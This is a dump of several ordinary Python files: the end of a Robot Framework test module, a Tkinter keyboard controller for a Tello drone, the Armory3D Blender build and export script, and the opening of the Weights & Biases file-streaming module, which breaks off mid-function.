return run_without_outputs(data, outputdir=TEMP, **config)
def _import_library(self):
return namespace.IMPORTER.import_library('BuiltIn', None, None, None)
def _import_resource(self):
resource = join(ROOT, 'atest', 'testdata', 'core', 'resources.robot')
return namespace.IMPORTER.import_resource(resource)
def test_clear_namespace_between_runs(self):
data = join(ROOT, 'atest', 'testdata', 'variables', 'commandline_variables.robot')
rc = self._run(data, test=['NormalText'], variable=['NormalText:Hello'])
assert_equal(rc, 0)
rc = self._run(data, test=['NormalText'])
assert_equal(rc, 1)
def test_reset_logging_conf(self):
assert_equal(logging.getLogger().handlers, [])
assert_equal(logging.raiseExceptions, 1)
self._run(join(ROOT, 'atest', 'testdata', 'misc', 'normal.robot'))
assert_equal(logging.getLogger().handlers, [])
assert_equal(logging.raiseExceptions, 1)
def test_listener_unregistration(self):
listener = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run_without_outputs(self.data, listener=listener+':1'), 0)
self._assert_outputs([("[from listener 1]", 1), ("[listener close]", 1)])
self._clear_outputs()
assert_equal(run_without_outputs(self.data), 0)
self._assert_outputs([("[from listener 1]", 0), ("[listener close]", 0)])
class TestTimestampOutputs(RunningTestCase):
output = join(TEMP, 'output-ts-*.xml')
report = join(TEMP, 'report-ts-*.html')
log = join(TEMP, 'log-ts-*.html')
remove_files = [output, report, log]
def test_different_timestamps_when_run_multiple_times(self):
self.run_tests()
output1, = self.find_results(self.output, 1)
report1, = self.find_results(self.report, 1)
log1, = self.find_results(self.log, 1)
self.wait_until_next_second()
self.run_tests()
output21, output22 = self.find_results(self.output, 2)
report21, report22 = self.find_results(self.report, 2)
log21, log22 = self.find_results(self.log, 2)
assert_equal(output1, output21)
assert_equal(report1, report21)
assert_equal(log1, log21)
def run_tests(self):
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
assert_equal(run(data, timestampoutputs=True, outputdir=TEMP,
output='output-ts.xml', report='report-ts.html',
log='log-ts'), 1)
def find_results(self, pattern, expected):
matches = glob.glob(pattern)
assert_equal(len(matches), expected)
return sorted(matches)
def wait_until_next_second(self):
start = time.localtime()[5]
while time.localtime()[5] == start:
time.sleep(0.01)
class TestSignalHandlers(unittest.TestCase):
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
def test_original_signal_handlers_are_restored(self):
orig_sigint = signal.getsignal(signal.SIGINT)
orig_sigterm = signal.getsignal(signal.SIGTERM)
my_sigterm = lambda signum, frame: None
signal.signal(signal.SIGTERM, my_sigterm)
try:
run_without_outputs(self.data, stdout=StringIO())
assert_equal(signal.getsignal(signal.SIGINT), orig_sigint)
assert_equal(signal.getsignal(signal.SIGTERM), my_sigterm)
finally:
signal.signal(signal.SIGINT, orig_sigint)
signal.signal(signal.SIGTERM, orig_sigterm)
def test_dont_register_signal_handlers_then_run_on_thread(self):
stream = StringIO()
thread = threading.Thread(target=run_without_outputs, args=(self.data,),
kwargs=dict(stdout=stream, stderr=stream))
thread.start()
thread.join()
output = stream.getvalue()
assert_true('ERROR' not in output.upper(), 'Errors:\n%s' % output)
class TestRelativeImportsFromPythonpath(RunningTestCase):
data = join(abspath(dirname(__file__)), 'import_test.robot')
def setUp(self):
self._orig_path = abspath(curdir)
chdir(ROOT)
sys.path.append(join('atest', 'testresources'))
def tearDown(self):
chdir(self._orig_path)
sys.path.pop()
def test_importing_library_from_pythonpath(self):
errors = StringIO()
run(self.data, outputdir=TEMP, stdout=StringIO(), stderr=errors)
self._assert_output(errors, '')
if __name__ == '__main__':
unittest.main()
|
ui.py
|
import tkinter as tki
from tkinter import Toplevel, Scale
import threading
import datetime
import os
import time
import platform
class TelloUI(object):
"""
Wrapper class to enable the GUI.
"""
def __init__(self, tello):
"""
Initializes all the element of the GUI, supported by Tkinter
:param tello: class interacts with the Tello drone.
"""
self.tello = tello # videostream device
self.thread = None # thread of the Tkinter mainloop
self.stopEvent = None
# control variables
self.distance = 0.1 # default distance for 'move' cmd
self.degree = 30 # default degree for 'cw' or 'ccw' cmd
        # if the flag is TRUE, the auto-takeoff thread will stop waiting
        # for the response from tello
self.quit_waiting_flag = False
# initialize the root window and image panel
self.root = tki.Tk()
self.panel = None
# create buttons
self.btn_landing = tki.Button(
self.root, text='Open Command Panel', relief='raised', command=self.openCmdWindow)
self.btn_landing.pack(side='bottom', fill='both',
expand='yes', padx=10, pady=5)
        # start a thread that constantly polls the video sensor for
        # the most recently read frame
self.stopEvent = threading.Event()
# set a callback to handle when the window is closed
self.root.wm_title('TELLO Controller')
self.root.wm_protocol('WM_DELETE_WINDOW', self.on_close)
        # the sending_command thread will send 'command' to tello every 5 seconds
self.sending_command_thread = threading.Thread(target = self._sendingCommand)
def _sendingCommand(self):
"""
Starts a while loop that sends 'command' to tello every 5 second.
:return: None
"""
while True:
self.tello.send_command('command')
time.sleep(5)
def _setQuitWaitingFlag(self):
"""
Set the variable as TRUE; it will stop computer waiting for response from tello.
:return: None
"""
self.quit_waiting_flag = True
def openCmdWindow(self):
"""
Open the cmd window and initial all the button and text.
:return: None
"""
panel = Toplevel(self.root)
panel.wm_title('Command Panel')
# create text input entry
text0 = tki.Label(panel,
                          text='This controller maps keyboard inputs to Tello control commands\n'
                               'Adjust the trackbars to reset the distance and degree parameters',
font='Helvetica 10 bold'
)
text0.pack(side='top')
text1 = tki.Label(panel, text=
'W - Move Tello Up\t\t\tArrow Up - Move Tello Forward\n'
'S - Move Tello Down\t\t\tArrow Down - Move Tello Backward\n'
'A - Rotate Tello Counter-Clockwise\tArrow Left - Move Tello Left\n'
'D - Rotate Tello Clockwise\t\tArrow Right - Move Tello Right',
justify='left')
text1.pack(side='top')
self.btn_landing = tki.Button(
panel, text='Land', relief='raised', command=self.telloLanding)
self.btn_landing.pack(side='bottom', fill='both',
expand='yes', padx=10, pady=5)
self.btn_takeoff = tki.Button(
panel, text='Takeoff', relief='raised', command=self.telloTakeOff)
self.btn_takeoff.pack(side='bottom', fill='both',
expand='yes', padx=10, pady=5)
# binding arrow keys to drone control
self.tmp_f = tki.Frame(panel, width=100, height=2)
self.tmp_f.bind('<KeyPress-w>', self.on_keypress_w)
self.tmp_f.bind('<KeyPress-s>', self.on_keypress_s)
self.tmp_f.bind('<KeyPress-a>', self.on_keypress_a)
self.tmp_f.bind('<KeyPress-d>', self.on_keypress_d)
self.tmp_f.bind('<KeyPress-Up>', self.on_keypress_up)
self.tmp_f.bind('<KeyPress-Down>', self.on_keypress_down)
self.tmp_f.bind('<KeyPress-Left>', self.on_keypress_left)
self.tmp_f.bind('<KeyPress-Right>', self.on_keypress_right)
self.tmp_f.pack(side='bottom')
self.tmp_f.focus_set()
self.btn_landing = tki.Button(
panel, text='Flip', relief='raised', command=self.openFlipWindow)
self.btn_landing.pack(side='bottom', fill='both',
expand='yes', padx=10, pady=5)
self.distance_bar = Scale(panel, from_=0.02, to=5, tickinterval=0.01,
digits=3, label='Distance(m)',
resolution=0.01)
self.distance_bar.set(0.2)
self.distance_bar.pack(side='left')
self.btn_distance = tki.Button(panel, text='Reset Distance', relief='raised',
command=self.updateDistancebar,
)
self.btn_distance.pack(side='left', fill='both',
expand='yes', padx=10, pady=5)
self.degree_bar = Scale(panel, from_=1, to=360, tickinterval=10, label='Degree')
self.degree_bar.set(30)
self.degree_bar.pack(side='right')
self.btn_distance = tki.Button(panel, text='Reset Degree', relief='raised',
command=self.updateDegreebar)
self.btn_distance.pack(side='right', fill='both',
expand='yes', padx=10, pady=5)
def openFlipWindow(self):
"""
Open the flip window and initial all the button and text.
:return: None
"""
panel = Toplevel(self.root)
panel.wm_title('Gesture Recognition')
self.btn_flipl = tki.Button(
panel, text='Flip Left', relief='raised', command=self.telloFlip_l)
self.btn_flipl.pack(side='bottom', fill='both',
expand='yes', padx=10, pady=5)
self.btn_flipr = tki.Button(
panel, text='Flip Right', relief='raised', command=self.telloFlip_r)
self.btn_flipr.pack(side='bottom', fill='both',
expand='yes', padx=10, pady=5)
self.btn_flipf = tki.Button(
panel, text='Flip Forward', relief='raised', command=self.telloFlip_f)
self.btn_flipf.pack(side='bottom', fill='both',
expand='yes', padx=10, pady=5)
self.btn_flipb = tki.Button(
panel, text='Flip Backward', relief='raised', command=self.telloFlip_b)
self.btn_flipb.pack(side='bottom', fill='both',
expand='yes', padx=10, pady=5)
def telloTakeOff(self):
return self.tello.takeoff()
def telloLanding(self):
return self.tello.land()
def telloFlip_l(self):
return self.tello.flip('l')
def telloFlip_r(self):
return self.tello.flip('r')
def telloFlip_f(self):
return self.tello.flip('f')
def telloFlip_b(self):
return self.tello.flip('b')
def telloCW(self, degree):
return self.tello.rotate_cw(degree)
def telloCCW(self, degree):
return self.tello.rotate_ccw(degree)
def telloMoveForward(self, distance):
return self.tello.move_forward(distance)
def telloMoveBackward(self, distance):
return self.tello.move_backward(distance)
def telloMoveLeft(self, distance):
return self.tello.move_left(distance)
def telloMoveRight(self, distance):
return self.tello.move_right(distance)
def telloUp(self, dist):
return self.tello.move_up(dist)
def telloDown(self, dist):
return self.tello.move_down(dist)
def updateDistancebar(self):
self.distance = self.distance_bar.get()
print(f'reset distance to {self.distance:.1f}')
def updateDegreebar(self):
self.degree = self.degree_bar.get()
        print(f'reset degree to {self.degree}')
def on_keypress_w(self, event):
print(f'up {self.distance} m')
self.telloUp(self.distance)
def on_keypress_s(self, event):
print(f'down {self.distance} m')
self.telloDown(self.distance)
def on_keypress_a(self, event):
print(f'ccw {self.degree} degree')
self.tello.rotate_ccw(self.degree)
def on_keypress_d(self, event):
        print(f'cw {self.degree} degree')
self.tello.rotate_cw(self.degree)
def on_keypress_up(self, event):
print(f'forward {self.distance} m')
self.telloMoveForward(self.distance)
def on_keypress_down(self, event):
print(f'backward {self.distance} m')
self.telloMoveBackward(self.distance)
def on_keypress_left(self, event):
print(f'left {self.distance} m')
self.telloMoveLeft(self.distance)
def on_keypress_right(self, event):
print(f'right {self.distance} m')
self.telloMoveRight(self.distance)
def on_close(self):
"""
Sets the stop event, cleanup the camera, and allow the rest of
the quit process to continue.
:return: None
"""
print('[INFO] closing...')
self.stopEvent.set()
del self.tello
self.root.quit()
|
make.py
|
import os
import glob
import time
import shutil
import bpy
import json
import stat
from bpy.props import *
import subprocess
import threading
import webbrowser
import arm.utils
import arm.write_data as write_data
import arm.make_logic as make_logic
import arm.make_renderpath as make_renderpath
import arm.make_world as make_world
import arm.make_state as state
import arm.assets as assets
import arm.log as log
import arm.lib.make_datas
import arm.lib.server
from arm.exporter import ArmoryExporter
exporter = ArmoryExporter()
scripts_mtime = 0 # Monitor source changes
profile_time = 0
def run_proc(cmd, done):
def fn(p, done):
p.wait()
if done != None:
done()
p = subprocess.Popen(cmd)
threading.Thread(target=fn, args=(p, done)).start()
return p
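# Illustrative usage sketch (hypothetical helper, for clarity only): run_proc starts a
# process and invokes the given callback from a watcher thread once it exits, which is
# how build_done and play_done below are wired up. The command here is a placeholder.
def _example_run_proc_usage():
    def on_done():
        print('process finished')
    return run_proc(['python', '--version'], on_done)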
def compile_shader_pass(res, raw_shaders_path, shader_name, defs):
os.chdir(raw_shaders_path + '/' + shader_name)
# Open json file
json_name = shader_name + '.json'
with open(json_name) as f:
json_file = f.read()
json_data = json.loads(json_file)
fp = arm.utils.get_fp_build()
arm.lib.make_datas.make(res, shader_name, json_data, fp, defs)
path = fp + '/compiled/Shaders'
c = json_data['contexts'][0]
for s in ['vertex_shader', 'fragment_shader', 'geometry_shader', 'tesscontrol_shader', 'tesseval_shader']:
if s in c:
shutil.copy(c[s], path + '/' + c[s].split('/')[-1])
def remove_readonly(func, path, excinfo):
os.chmod(path, stat.S_IWRITE)
func(path)
def export_data(fp, sdk_path):
global exporter
wrd = bpy.data.worlds['Arm']
print('\nArmory v{0} ({1})'.format(wrd.arm_version, wrd.arm_commit))
print('OS: ' + arm.utils.get_os() + ', Target: ' + state.target + ', GAPI: ' + arm.utils.get_gapi() + ', Blender: ' + bpy.app.version_string)
# Clean compiled variants if cache is disabled
build_dir = arm.utils.get_fp_build()
if wrd.arm_cache_build == False:
if os.path.isdir(build_dir + '/debug/html5-resources'):
shutil.rmtree(build_dir + '/debug/html5-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/krom-resources'):
shutil.rmtree(build_dir + '/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/debug/krom-resources'):
shutil.rmtree(build_dir + '/debug/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/windows-resources'):
shutil.rmtree(build_dir + '/windows-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/linux-resources'):
shutil.rmtree(build_dir + '/linux-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/osx-resources'):
shutil.rmtree(build_dir + '/osx-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/compiled/Shaders'):
shutil.rmtree(build_dir + '/compiled/Shaders', onerror=remove_readonly)
raw_shaders_path = sdk_path + '/armory/Shaders/'
assets_path = sdk_path + '/armory/Assets/'
export_physics = bpy.data.worlds['Arm'].arm_physics != 'Disabled'
export_navigation = bpy.data.worlds['Arm'].arm_navigation != 'Disabled'
export_ui = bpy.data.worlds['Arm'].arm_ui != 'Disabled'
assets.reset()
# Build node trees
ArmoryExporter.import_traits = []
make_logic.build()
make_world.build()
make_renderpath.build()
# Export scene data
assets.embedded_data = sorted(list(set(assets.embedded_data)))
physics_found = False
navigation_found = False
ui_found = False
ArmoryExporter.compress_enabled = state.is_publish and wrd.arm_asset_compression
ArmoryExporter.optimize_enabled = state.is_publish and wrd.arm_optimize_data
for scene in bpy.data.scenes:
if scene.arm_export:
ext = '.zip' if ArmoryExporter.compress_enabled else '.arm'
asset_path = build_dir + '/compiled/Assets/' + arm.utils.safestr(scene.name) + ext
exporter.execute(bpy.context, asset_path, scene=scene)
if ArmoryExporter.export_physics:
physics_found = True
if ArmoryExporter.export_navigation:
navigation_found = True
if ArmoryExporter.export_ui:
ui_found = True
assets.add(asset_path)
if physics_found == False: # Disable physics if no rigid body is exported
export_physics = False
if navigation_found == False:
export_navigation = False
if ui_found == False:
export_ui = False
if wrd.arm_ui == 'Enabled':
export_ui = True
modules = []
if wrd.arm_audio == 'Enabled':
modules.append('audio')
if export_physics:
modules.append('physics')
if export_navigation:
modules.append('navigation')
if export_ui:
modules.append('ui')
if wrd.arm_hscript == 'Enabled':
modules.append('hscript')
if wrd.arm_formatlib == 'Enabled':
modules.append('format')
print('Exported modules: ' + str(modules))
defs = arm.utils.def_strings_to_array(wrd.world_defs)
cdefs = arm.utils.def_strings_to_array(wrd.compo_defs)
print('Shader flags: ' + str(defs))
if wrd.arm_debug_console:
print('Khafile flags: ' + str(assets.khafile_defs))
# Write compiled.inc
shaders_path = build_dir + '/compiled/Shaders'
if not os.path.exists(shaders_path):
os.makedirs(shaders_path)
write_data.write_compiledglsl(defs + cdefs)
# Write referenced shader passes
if not os.path.isfile(build_dir + '/compiled/Shaders/shader_datas.arm') or state.last_world_defs != wrd.world_defs:
res = {}
res['shader_datas'] = []
for ref in assets.shader_passes:
# Ensure shader pass source exists
if not os.path.exists(raw_shaders_path + '/' + ref):
continue
assets.shader_passes_assets[ref] = []
if ref.startswith('compositor_pass'):
compile_shader_pass(res, raw_shaders_path, ref, defs + cdefs)
# elif ref.startswith('grease_pencil'):
# compile_shader_pass(res, raw_shaders_path, ref, [])
else:
compile_shader_pass(res, raw_shaders_path, ref, defs)
arm.utils.write_arm(shaders_path + '/shader_datas.arm', res)
for ref in assets.shader_passes:
for s in assets.shader_passes_assets[ref]:
assets.add_shader(shaders_path + '/' + s + '.glsl')
for file in assets.shaders_external:
name = file.split('/')[-1].split('\\')[-1]
target = build_dir + '/compiled/Shaders/' + name
if not os.path.exists(target):
shutil.copy(file, target)
state.last_world_defs = wrd.world_defs
# Reset path
os.chdir(fp)
# Copy std shaders
if not os.path.isdir(build_dir + '/compiled/Shaders/std'):
shutil.copytree(raw_shaders_path + 'std', build_dir + '/compiled/Shaders/std')
# Write config.arm
resx, resy = arm.utils.get_render_resolution(arm.utils.get_active_scene())
if wrd.arm_write_config:
write_data.write_config(resx, resy)
# Write khafile.js
enable_dce = state.is_publish and wrd.arm_dce
import_logic = not state.is_publish and arm.utils.logic_editor_space() != None
write_data.write_khafilejs(state.is_play, export_physics, export_navigation, export_ui, state.is_publish, enable_dce, state.is_viewport, ArmoryExporter.import_traits, import_logic)
# Write Main.hx - depends on write_khafilejs for writing number of assets
scene_name = arm.utils.get_project_scene_name()
write_data.write_mainhx(scene_name, resx, resy, state.is_play, state.is_viewport, state.is_publish)
if scene_name != state.last_scene or resx != state.last_resx or resy != state.last_resy:
wrd.arm_recompile = True
state.last_resx = resx
state.last_resy = resy
state.last_scene = scene_name
def compile(assets_only=False):
wrd = bpy.data.worlds['Arm']
fp = arm.utils.get_fp()
os.chdir(fp)
# Set build command
target_name = state.target
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path]
kha_target_name = arm.utils.get_kha_target(target_name)
if kha_target_name != '':
cmd.append(kha_target_name)
# Custom exporter
if state.is_export:
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
if item.arm_project_target == 'custom' and item.arm_project_khamake != '':
for s in item.arm_project_khamake.split(' '):
cmd.append(s)
ffmpeg_path = arm.utils.get_ffmpeg_path() # Path to binary
if ffmpeg_path != '':
cmd.append('--ffmpeg')
cmd.append(ffmpeg_path) # '"' + ffmpeg_path + '"'
state.export_gapi = arm.utils.get_gapi()
cmd.append('-g')
cmd.append(state.export_gapi)
if arm.utils.get_legacy_shaders() and not state.is_viewport:
cmd.append('--shaderversion')
cmd.append('110')
elif 'android' in state.target or 'ios' in state.target or 'html5' in state.target:
cmd.append('--shaderversion')
cmd.append('300')
else:
cmd.append('--shaderversion')
cmd.append('330')
if '_VR' in wrd.world_defs:
cmd.append('--vr')
cmd.append('webvr')
if arm.utils.get_rp().rp_renderer == 'Raytracer':
cmd.append('--raytrace')
cmd.append('dxr')
dxc_path = fp + '/HlslShaders/fxc.exe'
subprocess.Popen([dxc_path, '-Zpr', '-Fo', fp + '/Bundled/pt_raygeneration.o', '-T', 'lib_6_1', fp + '/HlslShaders/pt_raygeneration.hlsl'])
subprocess.Popen([dxc_path, '-Zpr', '-Fo', fp + '/Bundled/pt_closesthit.o', '-T', 'lib_6_1', fp + '/HlslShaders/pt_closesthit.hlsl'])
subprocess.Popen([dxc_path, '-Zpr', '-Fo', fp + '/Bundled/pt_miss.o', '-T', 'lib_6_1', fp + '/HlslShaders/pt_miss.hlsl'])
if arm.utils.get_khamake_threads() > 1:
cmd.append('--parallelAssetConversion')
cmd.append(str(arm.utils.get_khamake_threads()))
cmd.append('--to')
if (kha_target_name == 'krom' and not state.is_viewport and not state.is_publish) or (kha_target_name == 'html5' and not state.is_publish):
cmd.append(arm.utils.build_dir() + '/debug')
else:
cmd.append(arm.utils.build_dir())
if assets_only:
cmd.append('--nohaxe')
cmd.append('--noproject')
print("Running: ", cmd)
print("Using project from " + arm.utils.get_fp())
state.proc_build = run_proc(cmd, build_done)
def build_viewport():
if state.proc_build != None:
return
if not arm.utils.check_saved(None):
return
if not arm.utils.check_sdkpath(None):
return
arm.utils.check_default_props()
assets.invalidate_enabled = False
play(is_viewport=True)
assets.invalidate_enabled = True
def build(target, is_play=False, is_publish=False, is_viewport=False, is_export=False):
global profile_time
profile_time = time.time()
state.target = target
state.is_play = is_play
state.is_publish = is_publish
state.is_viewport = is_viewport
state.is_export = is_export
# Save blend
if arm.utils.get_save_on_build():
bpy.ops.wm.save_mainfile()
log.clear()
# Set camera in active scene
active_scene = arm.utils.get_active_scene()
if active_scene.camera == None:
for o in active_scene.objects:
if o.type == 'CAMERA':
active_scene.camera = o
break
# Get paths
sdk_path = arm.utils.get_sdk_path()
raw_shaders_path = sdk_path + '/armory/Shaders/'
# Set dir
fp = arm.utils.get_fp()
os.chdir(fp)
# Create directories
wrd = bpy.data.worlds['Arm']
sources_path = 'Sources/' + arm.utils.safestr(wrd.arm_project_package)
if not os.path.exists(sources_path):
os.makedirs(sources_path)
# Save external scripts edited inside Blender
write_texts = False
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty:
write_texts = True
break
if write_texts:
area = bpy.context.area
old_type = area.type
area.type = 'TEXT_EDITOR'
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty and os.path.isfile(text.filepath):
area.spaces[0].text = text
bpy.ops.text.save()
area.type = old_type
# Save internal Haxe scripts
for text in bpy.data.texts:
if text.filepath == '' and text.name[-3:] == '.hx':
with open('Sources/' + arm.utils.safestr(wrd.arm_project_package) + '/' + text.name, 'w') as f:
f.write(text.as_string())
# Export data
export_data(fp, sdk_path)
if state.target == 'html5':
w, h = arm.utils.get_render_resolution(arm.utils.get_active_scene())
write_data.write_indexhtml(w, h, is_publish)
# Bundle files from include dir
if os.path.isdir('include'):
dest = '/html5/' if is_publish else '/debug/html5/'
for fn in glob.iglob(os.path.join('include', '**'), recursive=False):
shutil.copy(fn, arm.utils.build_dir() + dest + os.path.basename(fn))
def play_done():
state.proc_play = None
state.redraw_ui = True
log.clear()
def build_done():
print('Finished in ' + str(time.time() - profile_time))
if state.proc_build == None:
return
result = state.proc_build.poll()
state.proc_build = None
state.redraw_ui = True
if result == 0:
bpy.data.worlds['Arm'].arm_recompile = False
build_success()
else:
log.print_info('Build failed, check console')
def runtime_to_target(is_viewport):
wrd = bpy.data.worlds['Arm']
if is_viewport or wrd.arm_runtime == 'Krom':
return 'krom'
else:
return 'html5'
def get_khajs_path(is_viewport, target):
if is_viewport:
return arm.utils.build_dir() + '/krom/krom.js'
elif target == 'krom':
return arm.utils.build_dir() + '/debug/krom/krom.js'
else: # Browser
return arm.utils.build_dir() + '/debug/html5/kha.js'
def play(is_viewport):
global scripts_mtime
global code_parsed
wrd = bpy.data.worlds['Arm']
log.clear()
build(target=runtime_to_target(is_viewport), is_play=True, is_viewport=is_viewport)
khajs_path = get_khajs_path(is_viewport, state.target)
if not wrd.arm_cache_build or \
not os.path.isfile(khajs_path) or \
assets.khafile_defs_last != assets.khafile_defs or \
state.last_target != state.target or \
state.last_is_viewport != state.is_viewport:
wrd.arm_recompile = True
state.last_target = state.target
state.last_is_viewport = state.is_viewport
# Trait sources modified
state.mod_scripts = []
script_path = arm.utils.get_fp() + '/Sources/' + arm.utils.safestr(wrd.arm_project_package)
if os.path.isdir(script_path):
new_mtime = scripts_mtime
for fn in glob.iglob(os.path.join(script_path, '**', '*.hx'), recursive=True):
mtime = os.path.getmtime(fn)
if scripts_mtime < mtime:
arm.utils.fetch_script_props(fn) # Trait props
fn = fn.split('Sources/')[1]
fn = fn[:-3] #.hx
fn = fn.replace('/', '.')
state.mod_scripts.append(fn)
wrd.arm_recompile = True
if new_mtime < mtime:
new_mtime = mtime
scripts_mtime = new_mtime
if len(state.mod_scripts) > 0: # Trait props
arm.utils.fetch_trait_props()
compile(assets_only=(not wrd.arm_recompile))
def build_success():
log.clear()
wrd = bpy.data.worlds['Arm']
if state.is_play:
if wrd.arm_runtime == 'Browser':
# Start server
os.chdir(arm.utils.get_fp())
t = threading.Thread(name='localserver', target=arm.lib.server.run)
t.daemon = True
t.start()
html5_app_path = 'http://localhost:8040/' + arm.utils.build_dir() + '/debug/html5'
webbrowser.open(html5_app_path)
elif wrd.arm_runtime == 'Krom':
if arm.utils.get_os() == 'win':
bin_ext = '' if state.export_gapi == 'direct3d11' else '_' + state.export_gapi
else:
bin_ext = '' if state.export_gapi == 'opengl' else '_' + state.export_gapi
krom_location, krom_path = arm.utils.krom_paths(bin_ext=bin_ext)
os.chdir(krom_location)
cmd = [krom_path, arm.utils.get_fp_build() + '/debug/krom', arm.utils.get_fp_build() + '/debug/krom-resources']
if arm.utils.get_os() == 'win':
cmd.append('--consolepid')
cmd.append(str(os.getpid()))
cmd.append('--sound')
elif arm.utils.get_os() == 'mac' or arm.utils.get_os() == 'linux': # TODO: Wait for new Krom audio
pass
state.proc_play = run_proc(cmd, play_done)
elif state.is_publish:
sdk_path = arm.utils.get_sdk_path()
target_name = arm.utils.get_kha_target(state.target)
files_path = arm.utils.get_fp_build() + '/' + target_name
if (target_name == 'html5' or target_name == 'krom') and wrd.arm_minify_js:
# Minify JS
minifier_path = sdk_path + '/lib/armory_tools/uglifyjs/bin/uglifyjs'
if target_name == 'html5':
jsfile = files_path + '/kha.js'
else:
jsfile = files_path + '/krom.js'
args = [arm.utils.get_node_path(), minifier_path, jsfile, '-o', jsfile]
proc = subprocess.Popen(args)
proc.wait()
if target_name == 'krom':
# Clean up
mapfile = files_path + '/krom.js.temp.map'
if os.path.exists(mapfile):
os.remove(mapfile)
# Copy Krom binaries
if state.target == 'krom-windows':
gapi = state.export_gapi
ext = '' if gapi == 'direct3d11' else '_' + gapi
krom_location = sdk_path + '/Krom/Krom' + ext + '.exe'
shutil.copy(krom_location, files_path + '/Krom.exe')
os.rename(files_path + '/Krom.exe', files_path + '/' + arm.utils.safestr(wrd.arm_project_name) + '.exe')
elif state.target == 'krom-linux':
krom_location = sdk_path + '/Krom/Krom'
shutil.copy(krom_location, files_path)
os.rename(files_path + '/Krom', files_path + '/' + arm.utils.safestr(wrd.arm_project_name))
else:
krom_location = sdk_path + '/Krom/Krom.app'
shutil.copytree(krom_location, files_path + '/Krom.app')
game_files = os.listdir(files_path)
for f in game_files:
f = files_path + '/' + f
if os.path.isfile(f):
shutil.move(f, files_path + '/Krom.app/Contents/MacOS')
os.rename(files_path + '/Krom.app', files_path + '/' + arm.utils.safestr(wrd.arm_project_name) + '.app')
# Rename
ext = state.target.split('-')[-1] # krom-windows
new_files_path = files_path + '-' + ext
os.rename(files_path, new_files_path)
files_path = new_files_path
if target_name == 'html5':
print('Exported HTML5 package to ' + files_path)
elif target_name.startswith('ios') or target_name.startswith('osx'): # TODO: to macos
print('Exported XCode project to ' + files_path + '-build')
elif target_name.startswith('windows'):
print('Exported Visual Studio 2017 project to ' + files_path + '-build')
elif target_name.startswith('android-native'):
print('Exported Android Studio project to ' + files_path + '-build/' + arm.utils.safestr(wrd.arm_project_name))
elif target_name.startswith('krom'):
print('Exported Krom package to ' + files_path)
else:
print('Exported makefiles to ' + files_path + '-build')
def clean():
os.chdir(arm.utils.get_fp())
wrd = bpy.data.worlds['Arm']
# Remove build and compiled data
try:
if os.path.isdir(arm.utils.build_dir()):
shutil.rmtree(arm.utils.build_dir(), onerror=remove_readonly)
if os.path.isdir(arm.utils.get_fp() + '/build'): # Kode Studio build dir
shutil.rmtree(arm.utils.get_fp() + '/build', onerror=remove_readonly)
except:
print('Armory Warning: Some files in the build folder are locked')
# Remove compiled nodes
pkg_dir = arm.utils.safestr(wrd.arm_project_package).replace('.', '/')
nodes_path = 'Sources/' + pkg_dir + '/node/'
if os.path.isdir(nodes_path):
shutil.rmtree(nodes_path, onerror=remove_readonly)
# Remove khafile/korefile/Main.hx
if os.path.isfile('khafile.js'):
os.remove('khafile.js')
if os.path.isfile('korefile.js'):
os.remove('korefile.js')
if os.path.isfile('Sources/Main.hx'):
os.remove('Sources/Main.hx')
# Remove Sources/ dir if empty
if os.path.exists('Sources/' + pkg_dir) and os.listdir('Sources/' + pkg_dir) == []:
shutil.rmtree('Sources/' + pkg_dir, onerror=remove_readonly)
if os.path.exists('Sources') and os.listdir('Sources') == []:
shutil.rmtree('Sources/', onerror=remove_readonly)
# To recache signatures for batched materials
for mat in bpy.data.materials:
mat.signature = ''
mat.arm_cached = False
print('Project cleaned')
|
file_stream.py
|
import base64
import binascii
import collections
import itertools
import logging
import os
import sys
import random
import requests
import threading
import time
import wandb
from wandb import util
from wandb import env
import six
from six.moves import queue
from ..lib import file_stream_utils
logger = logging.getLogger(__name__)
Chunk = collections.namedtuple("Chunk", ("filename", "data"))
class DefaultFilePolicy(object):
def __init__(self, start_chunk_id=0):
self._chunk_id = start_chunk_id
def process_chunks(self, chunks):
chunk_id = self._chunk_id
self._chunk_id += len(chunks)
return {"offset": chunk_id, "content": [c.data for c in chunks]}
class JsonlFilePolicy(DefaultFilePolicy):
def process_chunks(self, chunks):
chunk_id = self._chunk_id
# TODO: chunk_id is getting reset on each request...
self._chunk_id += len(chunks)
chunk_data = []
for chunk in chunks:
if len(chunk.data) > util.MAX_LINE_SIZE:
msg = "Metric data exceeds maximum size of {} ({})".format(
util.to_human_size(util.MAX_LINE_SIZE),
util.to_human_size(len(chunk.data)),
)
wandb.termerror(msg, repeat=False)
util.sentry_message(msg)
else:
chunk_data.append(chunk.data)
return {
"offset": chunk_id,
"content": chunk_data,
}
class SummaryFilePolicy(DefaultFilePolicy):
def process_chunks(self, chunks):
data = chunks[-1].data
if len(data) > util.MAX_LINE_SIZE:
msg = "Summary data exceeds maximum size of {}. Dropping it.".format(
util.to_human_size(util.MAX_LINE_SIZE)
)
wandb.termerror(msg, repeat=False)
util.sentry_message(msg)
return False
return {"offset": 0, "content": [data]}
class CRDedupeFilePolicy(DefaultFilePolicy):
"""File stream policy that removes characters that would be erased by
carriage returns.
This is what a terminal does. We use it for console output to reduce the
amount of data we need to send over the network (eg. for progress bars),
while preserving the output's appearance in the web app.
"""
def __init__(self, start_chunk_id=0):
super(CRDedupeFilePolicy, self).__init__(start_chunk_id=start_chunk_id)
self._prev_chunk = None
def process_chunks(self, chunks):
ret = []
flag = bool(self._prev_chunk)
chunk_id = self._chunk_id
for c in chunks:
# Line has two possible formats:
# 1) "2020-08-25T20:38:36.895321 this is my line of text"
# 2) "ERROR 2020-08-25T20:38:36.895321 this is my line of text"
prefix = ""
token, rest = c.data.split(" ", 1)
is_err = False
if token == "ERROR":
is_err = True
prefix += token + " "
token, rest = rest.split(" ", 1)
prefix += token + " "
lines = rest.split(os.linesep)
